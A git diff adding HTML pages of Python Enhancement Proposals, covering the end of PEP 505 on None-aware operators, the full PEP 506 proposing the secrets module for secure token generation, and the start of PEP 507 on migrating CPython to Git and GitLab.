+if _v is not None:
+    _v = _v.b
+    _v = _v(c)
+    _v = _v.d
+    if _v is not None:
+        _v = _v[e]
+await _v
+
+
+
+

Note

+

await will almost certainly fail in this context, as it would in +the case where code attempts await None. We are not proposing to add a +None-aware await keyword here, and merely include it in this +example for completeness of the specification, since the atom_expr +grammar rule includes the keyword. If it were in its own rule, we would have +never mentioned it.

+
+

Parenthesised expressions are handled by the atom rule (not shown above), +which will implicitly terminate the short-circuiting behaviour of the above +transformation. For example, (a?.b ?? c).d?.e is evaluated as:

+
# a?.b
+_v = a
+if _v is not None:
+    _v = _v.b
+
+# ... ?? c
+if _v is None:
+    _v = c
+
+# (...).d?.e
+_v = _v.d
+if _v is not None:
+    _v = _v.e
+
+
+

When used as an assignment target, the None-aware operations may only be +used in a “load” context. That is, a?.b = 1 and a?[b] = 1 will raise +SyntaxError. Use earlier in the expression (a?.b.c = 1) is permitted, +though unlikely to be useful unless combined with a coalescing operation:

+
(a?.b ?? d).c = 1
+
+
+
+
+
+

Reading expressions

+

For the maybe-dot and maybe-subscript operators, the intention is that +expressions including these operators should be read and interpreted as for the +regular versions of these operators. In “normal” cases, the end results are +going to be identical between an expression such as a?.b?[c] and +a.b[c], and just as we do not currently read “a.b” as “read attribute b +from a if it has an attribute a or else it raises AttributeError”, there is +no need to read “a?.b” as “read attribute b from a if a is not None” +(unless in a context where the listener needs to be aware of the specific +behaviour).

+

For coalescing expressions using the ?? operator, expressions should either +be read as “or … if None” or “coalesced with”. For example, the expression +a.get_value() ?? 100 would be read “call a dot get_value or 100 if None”, +or “call a dot get_value coalesced with 100”.

+
+

Note

+

Reading code in spoken text is always lossy, and so we make no attempt to +define an unambiguous way of speaking these operators. These suggestions +are intended to add context to the implications of adding the new syntax.

+
+
+
+
+

Examples

+

This section presents some examples of common None patterns and shows what +conversion to use None-aware operators may look like.

+
+

Standard Library

+

Using the find-pep505.py script [5] an analysis of the Python 3.7 standard +library discovered up to 678 code snippets that could be replaced with use of +one of the None-aware operators:

+
$ find /usr/lib/python3.7 -name '*.py' | xargs python3.7 find-pep505.py
+<snip>
+Total None-coalescing `if` blocks: 449
+Total [possible] None-coalescing `or`: 120
+Total None-coalescing ternaries: 27
+Total Safe navigation `and`: 13
+Total Safe navigation `if` blocks: 61
+Total Safe navigation ternaries: 8
+
+
+

Some of these are shown below as examples before and after converting to use the +new operators.

+

From bisect.py:

+
def insort_right(a, x, lo=0, hi=None):
+    # ...
+    if hi is None:
+        hi = len(a)
+    # ...
+
+
+

After updating to use the ??= augmented assignment statement:

+
def insort_right(a, x, lo=0, hi=None):
+    # ...
+    hi ??= len(a)
+    # ...
+
+
+

From calendar.py:

+
encoding = options.encoding
+if encoding is None:
+    encoding = sys.getdefaultencoding()
+optdict = dict(encoding=encoding, css=options.css)
+
+
+

After updating to use the ?? operator:

+
optdict = dict(encoding=options.encoding ?? sys.getdefaultencoding(),
+               css=options.css)
+
+
+

From email/generator.py (and importantly note that there is no way to +substitute or for ?? in this situation):

+
mangle_from_ = True if policy is None else policy.mangle_from_
+
+
+

After updating:

+
mangle_from_ = policy?.mangle_from_ ?? True
+
+
+

From asyncio/subprocess.py:

+
def pipe_data_received(self, fd, data):
+    if fd == 1:
+        reader = self.stdout
+    elif fd == 2:
+        reader = self.stderr
+    else:
+        reader = None
+    if reader is not None:
+        reader.feed_data(data)
+
+
+

After updating to use the ?. operator:

+
def pipe_data_received(self, fd, data):
+    if fd == 1:
+        reader = self.stdout
+    elif fd == 2:
+        reader = self.stderr
+    else:
+        reader = None
+    reader?.feed_data(data)
+
+
+

From asyncio/tasks.py:

+
try:
+    await waiter
+finally:
+    if timeout_handle is not None:
+        timeout_handle.cancel()
+
+
+

After updating to use the ?. operator:

+
try:
+    await waiter
+finally:
+    timeout_handle?.cancel()
+
+
+

From ctypes/_aix.py:

+
if libpaths is None:
+    libpaths = []
+else:
+    libpaths = libpaths.split(":")
+
+
+

After updating:

+
libpaths = libpaths?.split(":") ?? []
+
+
+

From os.py:

+
if entry.is_dir():
+    dirs.append(name)
+    if entries is not None:
+        entries.append(entry)
+else:
+    nondirs.append(name)
+
+
+

After updating to use the ?. operator:

+
if entry.is_dir():
+    dirs.append(name)
+    entries?.append(entry)
+else:
+    nondirs.append(name)
+
+
+

From importlib/abc.py:

+
def find_module(self, fullname, path):
+    if not hasattr(self, 'find_spec'):
+        return None
+    found = self.find_spec(fullname, path)
+    return found.loader if found is not None else None
+
+
+

After partially updating:

+
def find_module(self, fullname, path):
+    if not hasattr(self, 'find_spec'):
+        return None
+    return self.find_spec(fullname, path)?.loader
+
+
+

After extensive updating (arguably excessive, though that’s for the style +guides to determine):

+
def find_module(self, fullname, path):
+    return getattr(self, 'find_spec', None)?.__call__(fullname, path)?.loader
+
+
+

From dis.py:

+
def _get_const_info(const_index, const_list):
+    argval = const_index
+    if const_list is not None:
+        argval = const_list[const_index]
+    return argval, repr(argval)
+
+
+

After updating to use the ?[] and ?? operators:

+
def _get_const_info(const_index, const_list):
+    argval = const_list?[const_index] ?? const_index
+    return argval, repr(argval)
+
+
+
+
+

jsonify

+

This example is from a Python web crawler that uses the Flask framework as its +front-end. This function retrieves information about a web site from a SQL +database and formats it as JSON to send to an HTTP client:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        return jsonify(
+            first_seen=site.first_seen.isoformat() if site.first_seen is not None else None,
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=site.last_seen.isoformat() if site.last_seen is not None else None,
+            url=site.url.rstrip('/')
+        )
+
+
+

Both first_seen and last_seen are allowed to be null in the +database, and they are also allowed to be null in the JSON response. JSON +does not have a native way to represent a datetime, so the server’s contract +states that any non-null date is represented as an ISO-8601 string.

+

Without knowing the exact semantics of the first_seen and last_seen +attributes, it is impossible to know whether the attribute can be safely or +performantly accessed multiple times.

+

One way to fix this code is to replace each conditional expression with an +explicit value assignment and a full if/else block:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        first_seen_dt = site.first_seen
+        if first_seen_dt is None:
+            first_seen = None
+        else:
+            first_seen = first_seen_dt.isoformat()
+
+        last_seen_dt = site.last_seen
+        if last_seen_dt is None:
+            last_seen = None
+        else:
+            last_seen = last_seen_dt.isoformat()
+
+        return jsonify(
+            first_seen=first_seen,
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=last_seen,
+            url=site.url.rstrip('/')
+        )
+
+
+

This adds ten lines of code and four new code paths to the function, +dramatically increasing the apparent complexity. Rewriting using the +None-aware attribute operator results in shorter code with more clear +intent:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        return jsonify(
+            first_seen=site.first_seen?.isoformat(),
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=site.last_seen?.isoformat(),
+            url=site.url.rstrip('/')
+        )
+
+
+
+
+

Grab

+

The next example is from a Python scraping library called Grab:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        if ctype is None:
+            return 'application/octet-stream'
+        else:
+            return ctype
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        if filename is None:
+            self.filename = self.get_random_filename()
+        else:
+            self.filename = filename
+        if content_type is None:
+            self.content_type = self.find_content_type(self.filename)
+        else:
+            self.content_type = content_type
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        if filename is None:
+            self.filename = os.path.split(path)[1]
+        else:
+            self.filename = filename
+        if content_type is None:
+            self.content_type = self.find_content_type(self.filename)
+        else:
+            self.content_type = content_type
+
+
+

This example contains several good examples of needing to provide default +values. Rewriting to use conditional expressions reduces the overall lines of +code, but does not necessarily improve readability:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        return 'application/octet-stream' if ctype is None else ctype
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        self.filename = (self.get_random_filename() if filename
+            is None else filename)
+        self.content_type = (self.find_content_type(self.filename)
+            if content_type is None else content_type)
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        self.filename = (os.path.split(path)[1] if filename is
+            None else filename)
+        self.content_type = (self.find_content_type(self.filename)
+            if content_type is None else content_type)
+
+
+

The first ternary expression is tidy, but it reverses the intuitive order of +the operands: it should return ctype if it has a value and use the string +literal as fallback. The other ternary expressions are unintuitive and so +long that they must be wrapped. The overall readability is worsened, not +improved.

+

Rewriting using the None coalescing operator:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        return ctype ?? 'application/octet-stream'
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        self.filename = filename ?? self.get_random_filename()
+        self.content_type = content_type ?? self.find_content_type(self.filename)
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        self.filename = filename ?? os.path.split(path)[1]
+        self.content_type = content_type ?? self.find_content_type(self.filename)
+
+
+

This syntax has an intuitive ordering of the operands. In find_content_type, +for example, the preferred value ctype appears before the fallback value. +The terseness of the syntax also makes for fewer lines of code and less code to +visually parse, and reading from left-to-right and top-to-bottom more accurately +follows the execution flow.

+
+
+
+

Rejected Ideas

+

The first three ideas in this section are oft-proposed alternatives to treating +None as special. For further background on why these are rejected, see their +treatment in PEP 531 and +PEP 532 and the associated +discussions.

+
+

No-Value Protocol

+

The operators could be generalised to user-defined types by defining a protocol +to indicate when a value represents “no value”. Such a protocol may be a dunder +method __has_value__(self) that returns True if the value should be +treated as having a value, and False if the value should be treated as no +value.

+

With this generalization, object would implement a dunder method equivalent +to this:

+
def __has_value__(self):
+    return True
+
+
+

NoneType would implement a dunder method equivalent to this:

+
def __has_value__(self):
+    return False
+
+
+

In the specification section, all uses of x is None would be replaced with +not x.__has_value__().

+

This generalization would allow for domain-specific “no-value” objects to be +coalesced just like None. For example, the pyasn1 package has a type +called Null that represents an ASN.1 null:

+
>>> from pyasn1.type import univ
+>>> univ.Null() ?? univ.Integer(123)
+Integer(123)
+
+
+

Similarly, values such as math.nan and NotImplemented could be treated +as representing no value.

+

However, the “no-value” nature of these values is domain-specific, which means +they should be treated as a value by the language. For example, +math.nan.imag is well defined (it’s 0.0), and so short-circuiting +math.nan?.imag to return math.nan would be incorrect.

+

As None is already defined by the language as being the value that +represents “no value”, and the current specification would not preclude +switching to a protocol in the future (though changes to built-in objects would +not be compatible), this idea is rejected for now.

+
+
+

Boolean-aware operators

+

This suggestion is fundamentally the same as adding a no-value protocol, and so +the discussion above also applies.

+

Similar behavior to the ?? operator can be achieved with an or +expression, however or checks whether its left operand is false-y and not +specifically None. This approach is attractive, as it requires fewer changes +to the language, but ultimately does not solve the underlying problem correctly.

+

Assuming the check is for truthiness rather than None, there is no longer a +need for the ?? operator. However, applying this check to the ?. and +?[] operators prevents perfectly valid operations applying

+

Consider the following example, where get_log_list() may return either a +list containing current log messages (potentially empty), or None if logging +is not enabled:

+
lst = get_log_list()
+lst?.append('A log message')
+
+
+

If ?. is checking for true values rather than specifically None and the +log has not been initialized with any items, no item will ever be appended. This +violates the obvious intent of the code, which is to append an item. The +append method is available on an empty list, as are all other list methods, +and there is no reason to assume that these members should not be used because +the list is presently empty.

+

Further, there is no sensible result to use in place of the expression. A +normal lst.append returns None, but under this idea lst?.append may +result in either [] or None, depending on the value of lst. As with +the examples in the previous section, this makes no sense.

+

As checking for truthiness rather than None results in apparently valid +expressions no longer executing as intended, this idea is rejected.

+
+
+

Exception-aware operators

+

Arguably, the reason to short-circuit an expression when None is encountered +is to avoid the AttributeError or TypeError that would be raised under +normal circumstances. As an alternative to testing for None, the ?. and +?[] operators could instead handle AttributeError and TypeError +raised by the operation and skip the remainder of the expression.

+

This produces a transformation for a?.b.c?.d.e similar to this:

+
_v = a
+try:
+    _v = _v.b
+except AttributeError:
+    pass
+else:
+    _v = _v.c
+    try:
+        _v = _v.d
+    except AttributeError:
+        pass
+    else:
+        _v = _v.e
+
+
+

One open question is which value should be returned as the expression when an +exception is handled. The above example simply leaves the partial result, but +this is not helpful for replacing with a default value. An alternative would be +to force the result to None, which then raises the question as to why +None is special enough to be the result but not special enough to be the +test.

+

Secondly, this approach masks errors within code executed implicitly as part of +the expression. For ?., any AttributeError within a property or +__getattr__ implementation would be hidden, and similarly for ?[] and +__getitem__ implementations.

+

Similarly, simple typing errors such as {}?.ietms() could go unnoticed.

+

Existing conventions for handling these kinds of errors in the form of the +getattr builtin and the .get(key, default) method pattern established by +dict show that it is already possible to explicitly use this behaviour.

+

As this approach would hide errors in code, it is rejected.

+
+
+

None-aware Function Call

+

The None-aware syntax applies to attribute and index access, so it seems +natural to ask if it should also apply to function invocation syntax. It might +be written as foo?(), where foo is only called if it is not None.

+

This has been deferred on the basis of the proposed operators being intended +to aid traversal of partially populated hierarchical data structures, not +for traversal of arbitrary class hierarchies. This is reflected in the fact +that none of the other mainstream languages that already offer this syntax +have found it worthwhile to support a similar syntax for optional function +invocations.

+

A workaround similar to that used by C# would be to write +maybe_none?.__call__(arguments). If the callable is None, the +expression will not be evaluated. (The C# equivalent uses ?.Invoke() on its +callable type.)

+
+
+

? Unary Postfix Operator

+

To generalize the None-aware behavior and limit the number of new operators +introduced, a unary, postfix operator spelled ? was suggested. The idea is +that ? might return a special object that could would override dunder +methods that return self. For example, foo? would evaluate to foo if +it is not None, otherwise it would evaluate to an instance of +NoneQuestion:

+
class NoneQuestion():
+    def __call__(self, *args, **kwargs):
+        return self
+
+    def __getattr__(self, name):
+        return self
+
+    def __getitem__(self, key):
+        return self
+
+
+

With this new operator and new type, an expression like foo?.bar[baz] +evaluates to NoneQuestion if foo is None. This is a nifty +generalization, but it’s difficult to use in practice since most existing code +won’t know what NoneQuestion is.

+

Going back to one of the motivating examples above, consider the following:

+
>>> import json
+>>> created = None
+>>> json.dumps({'created': created?.isoformat()})
+
+
+

The JSON serializer does not know how to serialize NoneQuestion, nor will +any other API. This proposal actually requires lots of specialized logic +throughout the standard library and any third party library.

+

At the same time, the ? operator may also be too general, in the sense +that it can be combined with any other operator. What should the following +expressions mean?:

+
>>> x? + 1
+>>> x? -= 1
+>>> x? == 1
+>>> ~x?
+
+
+

This degree of generalization is not useful. The operators actually proposed +herein are intentionally limited to a few operators that are expected to make it +easier to write common code patterns.

+
+
+

Built-in maybe

+

Haskell has a concept called Maybe that +encapsulates the idea of an optional value without relying on any special +keyword (e.g. null) or any special instance (e.g. None). In Haskell, the +purpose of Maybe is to avoid separate handling of “something” and nothing”.

+

A Python package called pymaybe provides a +rough approximation. The documentation shows the following example:

+
>>> maybe('VALUE').lower()
+'value'
+
+>>> maybe(None).invalid().method().or_else('unknown')
+'unknown'
+
+
+

The function maybe() returns either a Something instance or a +Nothing instance. Similar to the unary postfix operator described in the +previous section, Nothing overrides dunder methods in order to allow +chaining on a missing value.

+

Note that or_else() is eventually required to retrieve the underlying value +from pymaybe’s wrappers. Furthermore, pymaybe does not short circuit any +evaluation. Although pymaybe has some strengths and may be useful in its own +right, it also demonstrates why a pure Python implementation of coalescing is +not nearly as powerful as support built into the language.

+

The idea of adding a builtin maybe type to enable this scenario is rejected.

+
+
+

Just use a conditional expression

+

Another common way to initialize default values is to use the ternary operator. +Here is an excerpt from the popular Requests package:

+
data = [] if data is None else data
+files = [] if files is None else files
+headers = {} if headers is None else headers
+params = {} if params is None else params
+hooks = {} if hooks is None else hooks
+
+
+

This particular formulation has the undesirable effect of putting the operands +in an unintuitive order: the brain thinks, “use data if possible and use +[] as a fallback,” but the code puts the fallback before the preferred +value.

+

The author of this package could have written it like this instead:

+
data = data if data is not None else []
+files = files if files is not None else []
+headers = headers if headers is not None else {}
+params = params if params is not None else {}
+hooks = hooks if hooks is not None else {}
+
+
+

This ordering of the operands is more intuitive, but it requires 4 extra +characters (for “not “). It also highlights the repetition of identifiers: +data if data, files if files, etc.

+

When written using the None coalescing operator, the sample reads:

+
data = data ?? []
+files = files ?? []
+headers = headers ?? {}
+params = params ?? {}
+hooks = hooks ?? {}
+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0505.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0506/index.html b/pep-0506/index.html new file mode 100644 index 00000000000..cf7e4310cf8 --- /dev/null +++ b/pep-0506/index.html @@ -0,0 +1,587 @@ + + + + + + + + PEP 506 – Adding A Secrets Module To The Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 506 – Adding A Secrets Module To The Standard Library

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Sep-2015
+
Python-Version:
+
3.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a module for common security-related +functions such as generating tokens to the Python standard library.

+
+
+

Definitions

+

Some common abbreviations used in this proposal:

+
    +
  • PRNG:

    Pseudo Random Number Generator. A deterministic algorithm used +to produce random-looking numbers with certain desirable +statistical properties.

    +
  • +
  • CSPRNG:

    Cryptographically Strong Pseudo Random Number Generator. An +algorithm used to produce random-looking numbers which are +resistant to prediction.

    +
  • +
  • MT:

    Mersenne Twister. An extensively studied PRNG which is currently +used by the random module as the default.

    +
  • +
+
+
+

Rationale

+

This proposal is motivated by concerns that Python’s standard library +makes it too easy for developers to inadvertently make serious security +errors. Theo de Raadt, the founder of OpenBSD, contacted Guido van Rossum +and expressed some concern [1] about the use of MT for generating sensitive +information such as passwords, secure tokens, session keys and similar.

+

Although the documentation for the random module explicitly states that +the default is not suitable for security purposes [2], it is strongly +believed that this warning may be missed, ignored or misunderstood by +many Python developers. In particular:

+
    +
  • developers may not have read the documentation and consequently +not seen the warning;
  • +
  • they may not realise that their specific use of the module has security +implications; or
  • +
  • not realising that there could be a problem, they have copied code +(or learned techniques) from websites which don’t offer best +practises.
  • +
+

The first [3] hit when searching for “python how to generate passwords” on +Google is a tutorial that uses the default functions from the random +module [4]. Although it is not intended for use in web applications, it is +likely that similar techniques find themselves used in that situation. +The second hit is to a StackOverflow question about generating +passwords [5]. Most of the answers given, including the accepted one, use +the default functions. When one user warned that the default could be +easily compromised, they were told “I think you worry too much.” [6]

+

This strongly suggests that the existing random module is an attractive +nuisance when it comes to generating (for example) passwords or secure +tokens.

+

Additional motivation (of a more philosophical bent) can be found in the +post which first proposed this idea [7].

+
+
+

Proposal

+

Alternative proposals have focused on the default PRNG in the random +module, with the aim of providing “secure by default” cryptographically +strong primitives that developers can build upon without thinking about +security. (See Alternatives below.) This proposes a different approach:

+
    +
  • The standard library already provides cryptographically strong +primitives, but many users don’t know they exist or when to use them.
  • +
  • Instead of requiring crypto-naive users to write secure code, the +standard library should include a set of ready-to-use “batteries” for +the most common needs, such as generating secure tokens. This code +will both directly satisfy a need (“How do I generate a password reset +token?”), and act as an example of acceptable practises which +developers can learn from [8].
  • +
+

To do this, this PEP proposes that we add a new module to the standard +library, with the suggested name secrets. This module will contain a +set of ready-to-use functions for common activities with security +implications, together with some lower-level primitives.

+

The suggestion is that secrets becomes the go-to module for dealing +with anything which should remain secret (passwords, tokens, etc.) +while the random module remains backward-compatible.

+
+
+

API and Implementation

+

This PEP proposes the following functions for the secrets module:

+
    +
  • Functions for generating tokens suitable for use in (e.g.) password +recovery, as session keys, etc., in the following formats:
      +
    • as bytes, secrets.token_bytes;
    • +
    • as text, using hexadecimal digits, secrets.token_hex;
    • +
    • as text, using URL-safe base-64 encoding, secrets.token_urlsafe.
    • +
    +
  • +
  • A limited interface to the system CSPRNG, using either os.urandom +directly or random.SystemRandom. Unlike the random module, this +does not need to provide methods for seeding, getting or setting the +state, or any non-uniform distributions. It should provide the +following:
      +
    • A function for choosing items from a sequence, secrets.choice.
    • +
    • A function for generating a given number of random bits and/or bytes +as an integer, secrets.randbits.
    • +
    • A function for returning a random integer in the half-open range +0 to the given upper limit, secrets.randbelow [9].
    • +
    +
  • +
  • A function for comparing text or bytes digests for equality while being +resistant to timing attacks, secrets.compare_digest.
  • +
+

The consensus appears to be that there is no need to add a new CSPRNG to +the random module to support these uses, SystemRandom will be +sufficient.

+

Some illustrative implementations have been given by Alyssa (Nick) Coghlan [10] +and a minimalist API by Tim Peters [11]. This idea has also been discussed +on the issue tracker for the “cryptography” module [12]. The following +pseudo-code should be taken as the starting point for the real +implementation:

+
from random import SystemRandom
+from hmac import compare_digest
+
+_sysrand = SystemRandom()
+
+randbits = _sysrand.getrandbits
+choice = _sysrand.choice
+
+def randbelow(exclusive_upper_bound):
+    return _sysrand._randbelow(exclusive_upper_bound)
+
+DEFAULT_ENTROPY = 32  # bytes
+
+def token_bytes(nbytes=None):
+    if nbytes is None:
+        nbytes = DEFAULT_ENTROPY
+    return os.urandom(nbytes)
+
+def token_hex(nbytes=None):
+    return binascii.hexlify(token_bytes(nbytes)).decode('ascii')
+
+def token_urlsafe(nbytes=None):
+    tok = token_bytes(nbytes)
+    return base64.urlsafe_b64encode(tok).rstrip(b'=').decode('ascii')
+
+
+

The secrets module itself will be pure Python, and other Python +implementations can easily make use of it unchanged, or adapt it as +necessary. An implementation can be found on BitBucket [13].

+
+

Default arguments

+

One difficult question is “How many bytes should my token be?”. We can +help with this question by providing a default amount of entropy for the +“token_*” functions. If the nbytes argument is None or not given, the +default entropy will be used. This default value should be large enough +to be expected to be secure for medium-security uses, but is expected to +change in the future, possibly even in a maintenance release [14].

+
+
+

Naming conventions

+

One question is the naming conventions used in the module [15], whether to +use C-like naming conventions such as “randrange” or more Pythonic names +such as “random_range”.

+

Functions which are simply bound methods of the private SystemRandom +instance (e.g. randrange), or a thin wrapper around such, should keep +the familiar names. Those which are something new (such as the various +token_* functions) will use more Pythonic names.

+
+
+
+

Alternatives

+

One alternative is to change the default PRNG provided by the random +module [16]. This received considerable scepticism and outright opposition:

+
    +
  • There is fear that a CSPRNG may be slower than the current PRNG (which +in the case of MT is already quite slow).
  • +
  • Some applications (such as scientific simulations, and replaying +gameplay) require the ability to seed the PRNG into a known state, +which a CSPRNG lacks by design.
  • +
  • Another major use of the random module is for simple “guess a number” +games written by beginners, and many people are loath to make any +change to the random module which may make that harder.
  • +
  • Although there is no proposal to remove MT from the random module, +there was considerable hostility to the idea of having to opt-in to +a non-CSPRNG or any backwards-incompatible changes.
  • +
  • Demonstrated attacks against MT are typically against PHP applications. +It is believed that PHP’s version of MT is a significantly softer target +than Python’s version, due to a poor seeding technique [17]. Consequently, +without a proven attack against Python applications, many people object +to a backwards-incompatible change.
  • +
+

Alyssa Coghlan made an earlier suggestion +for a globally configurable PRNG +which uses the system CSPRNG by default, but has since withdrawn it +in favour of this proposal.

+
+
+

Comparison To Other Languages

+
    +
  • PHP

    PHP includes a function uniqid [18] which by default returns a +thirteen character string based on the current time in microseconds. +Translated into Python syntax, it has the following signature:

    +
    def uniqid(prefix='', more_entropy=False)->str
    +
    +
    +

    The PHP documentation warns that this function is not suitable for +security purposes. Nevertheless, various mature, well-known PHP +applications use it for that purpose (citation needed).

    +

    PHP 5.3 and better also includes a function openssl_random_pseudo_bytes +[19]. Translated into Python syntax, it has roughly the following +signature:

    +
    def openssl_random_pseudo_bytes(length:int)->Tuple[str, bool]
    +
    +
    +

    This function returns a pseudo-random string of bytes of the given +length, and a boolean flag giving whether the string is considered +cryptographically strong. The PHP manual suggests that returning +anything but True should be rare except for old or broken platforms.

    +
  • +
  • JavaScript

    Based on a rather cursory search [20], there do not appear to be any +well-known standard functions for producing strong random values in +JavaScript. Math.random is often used, despite serious weaknesses +making it unsuitable for cryptographic purposes [21]. In recent years +the majority of browsers have gained support for window.crypto.getRandomValues [22].

    +

    Node.js offers a rich cryptographic module, crypto [23], most of +which is beyond the scope of this PEP. It does include a single function +for generating random bytes, crypto.randomBytes.

    +
  • +
  • Ruby

    The Ruby standard library includes a module SecureRandom [24] +which includes the following methods:

    +
      +
    • base64 - returns a Base64 encoded random string.
    • +
    • hex - returns a random hexadecimal string.
    • +
    • random_bytes - returns a random byte string.
    • +
    • random_number - depending on the argument, returns either a random +integer in the range(0, n), or a random float between 0.0 and 1.0.
    • +
    • urlsafe_base64 - returns a random URL-safe Base64 encoded string.
    • +
    • uuid - return a version 4 random Universally Unique IDentifier.
    • +
    +
  • +
+
+
+

What Should Be The Name Of The Module?

+

There was a proposal to add a “random.safe” submodule, quoting the Zen +of Python “Namespaces are one honking great idea” koan. However, the +author of the Zen, Tim Peters, has come out against this idea [25], and +recommends a top-level module.

+

In discussion on the python-ideas mailing list so far, the name “secrets” +has received some approval, and no strong opposition.

+

There is already an existing third-party module with the same name [26], +but it appears to be unused and abandoned.

+
+
+

Frequently Asked Questions

+
    +
  • Q: Is this a real problem? Surely MT is random enough that nobody can +predict its output.

    A: The consensus among security professionals is that MT is not safe +in security contexts. It is not difficult to reconstruct the internal +state of MT [27] [28] and so predict all past and future values. There +are a number of known, practical attacks on systems using MT for +randomness [29].

    +
  • +
  • Q: Attacks on PHP are one thing, but are there any known attacks on +Python software?

    A: Yes. There have been vulnerabilities in Zope and Plone at the very +least. Hanno Schlichting commented [30]:

    +
    "In the context of Plone and Zope a practical attack was
    +demonstrated, but I can't find any good non-broken links about
    +this anymore.  IIRC Plone generated a random number and exposed
    +this on each error page along the lines of 'Sorry, you encountered
    +an error, your problem has been filed as <random number>, please
    +include this when you contact us'.  This allowed anyone to do large
    +numbers of requests to this page and get enough random values to
    +reconstruct the MT state.  A couple of security related modules used
    +random instead of system random (cookie session ids, password reset
    +links, auth token), so the attacker could break all of those."
    +
    +
    +

    Christian Heimes reported this issue to the Zope security team in 2012 [31], +there are at least two related CVE vulnerabilities [32], and at least one +work-around for this issue in Django [33].

    +
  • +
  • Q: Is this an alternative to specialist cryptographic software such as SSL?

    A: No. This is a “batteries included” solution, not a full-featured +“nuclear reactor”. It is intended to mitigate against some basic +security errors, not be a solution to all security-related issues. To +quote Alyssa Coghlan referring to her earlier proposal [34]:

    +
    "...folks really are better off learning to use things like
    +cryptography.io for security sensitive software, so this change
    +is just about harm mitigation given that it's inevitable that a
    +non-trivial proportion of the millions of current and future
    +Python developers won't do that."
    +
    +
    +
  • +
  • Q: What about a password generator?

    A: The consensus is that the requirements for password generators are too +variable for it to be a good match for the standard library [35]. No password +generator will be included in the initial release of the module, instead it +will be given in the documentation as a recipe (à la the recipes in the +itertools module) [36].

    +
  • +
  • Q: Will secrets use /dev/random (which blocks) or /dev/urandom (which +doesn’t block) on Linux? What about other platforms?

    A: secrets will be based on os.urandom and random.SystemRandom, +which are interfaces to your operating system’s best source of cryptographic +randomness. On Linux, that may be /dev/urandom [37], on Windows it may be +CryptGenRandom(), but see the documentation and/or source code for the +detailed implementation details.

    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0506.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0507/index.html b/pep-0507/index.html new file mode 100644 index 00000000000..a011b231d9a --- /dev/null +++ b/pep-0507/index.html @@ -0,0 +1,424 @@ + + + + + + + + PEP 507 – Migrate CPython to Git and GitLab | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 507 – Migrate CPython to Git and GitLab

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Process
+
Created:
+
30-Sep-2015
+
Post-History:
+

+
Resolution:
+
Core-Workflow message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes migrating the repository hosting of CPython and the +supporting repositories to Git. Further, it proposes adopting a +hosted GitLab instance as the primary way of handling merge requests, +code reviews, and code hosting. It is similar in intent to PEP 481 +but proposes an open source alternative to GitHub and omits the +proposal to run Phabricator. As with PEP 481, this particular PEP is +offered as an alternative to PEP 474 and PEP 462.

+
+
+

Rationale

+

CPython is an open source project which relies on a number of +volunteers donating their time. As with any healthy, vibrant open +source project, it relies on attracting new volunteers as well as +retaining existing developers. Given that volunteer time is the most +scarce resource, providing a process that maximizes the efficiency of +contributors and reduces the friction for contributions, is of vital +importance for the long-term health of the project.

+

The current tool chain of the CPython project is a custom and unique +combination of tools. This has two critical implications:

+
    +
  • The unique nature of the tool chain means that contributors must +remember or relearn, the process, workflow, and tools whenever they +contribute to CPython, without the advantage of leveraging long-term +memory and familiarity they retain by working with other projects in +the FLOSS ecosystem. The knowledge they gain in working with +CPython is unlikely to be applicable to other projects.
  • +
  • The burden on the Python/PSF infrastructure team is much greater in +order to continue to maintain custom tools, improve them over time, +fix bugs, address security issues, and more generally adapt to new +standards in online software development with global collaboration.
  • +
+

These limitations act as a barrier to contribution both for highly +engaged contributors (e.g. core Python developers) and especially for +more casual “drive-by” contributors, who care more about getting their +bug fix than learning a new suite of tools and workflows.

+

By proposing the adoption of both a different version control system +and a modern, well-maintained hosting solution, this PEP addresses +these limitations. It aims to enable a modern, well-understood +process that will carry CPython development for many years.

+
+

